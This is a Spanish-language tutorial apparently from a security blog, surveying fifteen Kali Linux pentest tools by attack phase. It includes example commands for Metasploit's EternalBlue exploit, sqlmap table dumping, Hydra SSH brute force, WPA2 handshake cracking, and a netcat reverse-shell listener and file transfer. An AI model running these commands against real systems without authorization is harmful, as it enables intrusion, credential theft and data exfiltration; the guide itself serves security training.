Las 15 mejores herramientas de Kali Linux 2026 — organizadas por fase de pentestKali Linux 2026 incluye más de 600 herramientas preinstaladas para pruebas de penetración, análisis forense e ingeniería inversa, mantenida por Offensive Security. Con el menú reorganizado según el framework MITRE ATT&CK desde la versión 2025.2, esta guía presenta las 15 herramientas imprescindibles que todo pentester profesional debe dominar, con comandos reales y casos de uso.
🗺️ Fase 1 — Reconocimiento e información
1. Nmap — El rey del escaneo de redes
Nmap (Network Mapper) es la herramienta de reconocimiento más usada del mundo. Descubre hosts activos, puertos, servicios, versiones y sistemas operativos. Su motor NSE (Nmap Scripting Engine) añade cientos de scripts de detección de vulnerabilidades.
# Escaneo completo con detección de versiones y OS
nmap -sV -sC -O -A 192.168.1.0/24
# Escaneo SYN stealth
nmap -sS -p 1-65535 target.com
# Scripts de vulnerabilidades
nmap --script vuln target.com2. Maltego — OSINT visual en grafos
Maltego es la herramienta de OSINT visual más potente de Kali. Construye automáticamente grafos de relaciones entre dominios, IPs, personas, emails y redes sociales. La edición Community es gratuita e incluida en Kali. Ideal para reconocimiento pasivo.
💥 Fase 2 — Explotación de vulnerabilidades
3. Metasploit Framework — +2.000 exploits en una consola
Metasploit Framework es la herramienta de explotación más conocida del mundo. Con más de 2.000 exploits y 1.500 payloads, permite detectar vulnerabilidades y explotarlas. En 2026, el módulo MetasploitMCP (Kali 2026.1) añade integración con IA.
msfconsole
search type:exploit name:eternalblue
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
run🌐 Fase 3 — Pentesting de aplicaciones web
4. Burp Suite — El proxy de interceptación web
Burp Suite es el estándar para pentesting web. Como proxy de interceptación captura, modifica y reproduce peticiones HTTP/HTTPS. Detecta XSS, CSRF, SQLi, IDOR y SSRF. La edición Community (incluida en Kali) es gratuita; Professional $399/año añade el scanner automático.
5. SQLMap — Inyección SQL automática
SQLMap automatiza la detección y explotación de SQL injection en MySQL, PostgreSQL, MSSQL y Oracle. Puede extraer el esquema completo de una base de datos, descargar tablas enteras y en condiciones favorables obtener una shell del servidor.
sqlmap -u "http://target.com/page?id=1" --dbs
sqlmap -u URL -D database -T users --dump6. Nikto — Escáner web de vulnerabilidades
Nikto realiza más de 6.700 comprobaciones automáticas contra servidores web: archivos peligrosos, versiones vulnerables, configuraciones incorrectas. Perfecto para el análisis inicial rápido de la superficie de ataque web.
nikto -h https://target.com -ssl -output report.txt7. Gobuster — Enumeración de directorios y DNS
Gobuster realiza fuerza bruta de directorios, subdominios DNS y virtual hosts. Escrito en Go, es significativamente más rápido que alternativas. Descubre rutas ocultas: paneles de administración, copias de seguridad, archivos de configuración.
gobuster dir -u https://target.com -w /usr/share/wordlists/dirb/common.txt -x php,html,txt📡 Fase 4 — Análisis de red y tráfico
8. Wireshark — El analizador de protocolos de referencia mundial
Wireshark captura y analiza tráfico de red en tiempo real o desde archivos PCAP. Soporta más de 1.000 protocolos con disección profunda. Detecta credenciales en texto plano, ataques en curso y comunicaciones sospechosas. La CLI tshark permite automatizar capturas.
9. Bettercap — El MITM moderno
Bettercap es la herramienta más completa para ataques Man-in-the-Middle en redes locales. Reemplaza al clásico Ettercap con arquitectura modular y API REST. Soporta ARP spoofing, DNS spoofing, captura de credenciales e inyección de contenido HTTP.
bettercap -iface eth0🔓 Fase 5 — Cracking de contraseñas
10. John the Ripper — El cracker CPU clásico
John the Ripper (versión Jumbo en Kali) soporta cientos de formatos de hash: MD5, SHA-1/256/512, NTLM, bcrypt, argon2, WPA. Ataques de diccionario, fuerza bruta y reglas de mangling. Esencial para descifrar hashes extraídos de sistemas comprometidos.
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
john --show hashes.txt11. Hashcat — El más rápido del mundo (GPU)
Hashcat usa la GPU para cracking masivo: miles de millones de intentos por segundo. Soporta más de 300 tipos de hash. Entre 10x y 100x más rápido que JtR con GPU moderna para la mayoría de tipos de hash.
hashcat -a 0 -m 1000 ntlm_hashes.txt rockyou.txt
# -m 1000 = NTLM | -m 0 = MD5 | -m 1800 = sha512crypt12. Hydra — Fuerza bruta en servicios de red
Hydra prueba credenciales directamente contra servicios remotos: SSH, FTP, HTTP, HTTPS, RDP, SMB, SMTP, IMAP, Telnet y más de 50 protocolos. Paralelización masiva para acelerar los ataques.
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.1📶 Fase 6 — Wireless y post-explotación
13. Aircrack-ng — La suite de auditoría Wi-Fi más completa
Aircrack-ng incluye: airmon-ng (modo monitor), airodump-ng (captura de paquetes), aireplay-ng (inyección) y aircrack-ng (descifrado WEP/WPA/WPA2). Requiere tarjeta con soporte para modo monitor e inyección.
# 1. Activar modo monitor
airmon-ng start wlan0
# 2. Capturar handshake WPA2
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w captura wlan0mon
# 3. Crackear con diccionario
aircrack-ng captura.cap -w /usr/share/wordlists/rockyou.txt14. Netcat (nc) — La navaja suiza de TCP/UDP
Netcat crea conexiones TCP/UDP en cualquier dirección, crea shells reversas, transfiere archivos y depura comunicaciones. La versión ncat (incluida con Nmap) añade SSL/TLS.
nc -lvnp 4444 # Escuchar (reverse shell)
nc -w 3 192.168.1.100 9999 < archivo.txt # Transferir15. BeEF — Explotación del navegador web
BeEF (Browser Exploitation Framework) inyecta JavaScript via XSS y toma control del navegador: roba cookies, captura teclas, hace screenshots y pivota hacia la red interna. Es la herramienta de referencia para demostrar el impacto real de una vulnerabilidad XSS.
Tabla resumen: las 15 herramientas por fase MITRE ATT&CK
| # | Herramienta | Fase MITRE ATT&CK | Licencia | Nivel |
|---|---|---|---|---|
| 1 | Nmap | Reconnaissance | GPLv2 | ⭐ Esencial |
| 2 | Maltego | Reconnaissance · OSINT | Community free | ⭐ Esencial |
| 3 | Metasploit | Exploitation | BSD | ⭐ Esencial |
| 4 | Burp Suite | Web Application Attacks | Community free | ⭐ Esencial |
| 5 | SQLMap | Web · SQL Injection | GPLv2 | 🔧 Intermedio |
| 6 | Nikto | Web Scanning | GPLv2 | 🌱 Principiante |
| 7 | Gobuster | Discovery · Enumeration | Apache-2.0 | 🌱 Principiante |
| 8 | Wireshark | Network Sniffing | GPLv2 | ⭐ Esencial |
| 9 | Bettercap | MITM · Collection | GPLv3 | 🔧 Intermedio |
| 10 | John the Ripper | Credential Access | Open source | 🌱 Principiante |
| 11 | Hashcat | Credential Access · GPU | MIT | 🔧 Intermedio |
| 12 | Hydra | Brute Force · Online | AGPL-3.0 | 🌱 Principiante |
| 13 | Aircrack-ng | Wireless Attacks | GPLv2 | 🔧 Intermedio |
| 14 | Netcat | Post-Exploitation · C2 | Open source | ⭐ Esencial |
| 15 | BeEF | Client-Side · XSS | Apache-2.0 | 🔧 Intermedio |
Conclusión
Con más de 600 herramientas en Kali Linux 2026, la clave es entender por qué funciona cada una. Nmap es poderoso si comprendes TCP/IP. Metasploit es efectivo si entiendes los exploits que usa. La recomendación práctica: instala Kali en una VM, crea un laboratorio con máquinas vulnerables (VulnHub, TryHackMe, HackTheBox) y practica estas 15 herramientas en orden. Cuando completes tu primera auditoría de extremo a extremo en un entorno controlado, habrás dado el primer paso real hacia la ciberseguridad ofensiva profesional.
Preguntas frecuentes
¿Kali Linux es ilegal de usar?
No, Kali Linux es completamente legal. Es software libre. Sus herramientas son legales en sistemas propios o con autorización escrita del propietario. Usarlas sin permiso en sistemas ajenos es delito informático en prácticamente todos los países.
¿Por dónde empezar si soy principiante en Kali Linux?
Aprende fundamentos de redes (TCP/IP, HTTP, DNS), instala Kali en VirtualBox, crea un laboratorio con VMs vulnerables de VulnHub o TryHackMe. Empieza con Nmap para escaneo, Wireshark para ver tráfico y Metasploit con vulnerabilidades conocidas. Nunca practiques sin permiso.
¿Diferencias entre Kali Linux y Parrot OS para pentesting?
Kali es más especializada en pentesting puro, con respaldo de Offensive Security y referencia en certificaciones (OSCP, CEH, PNPT). Parrot es más ligera e incluye herramientas de privacidad. En 2026 Kali mantiene ventaja en adopción profesional.
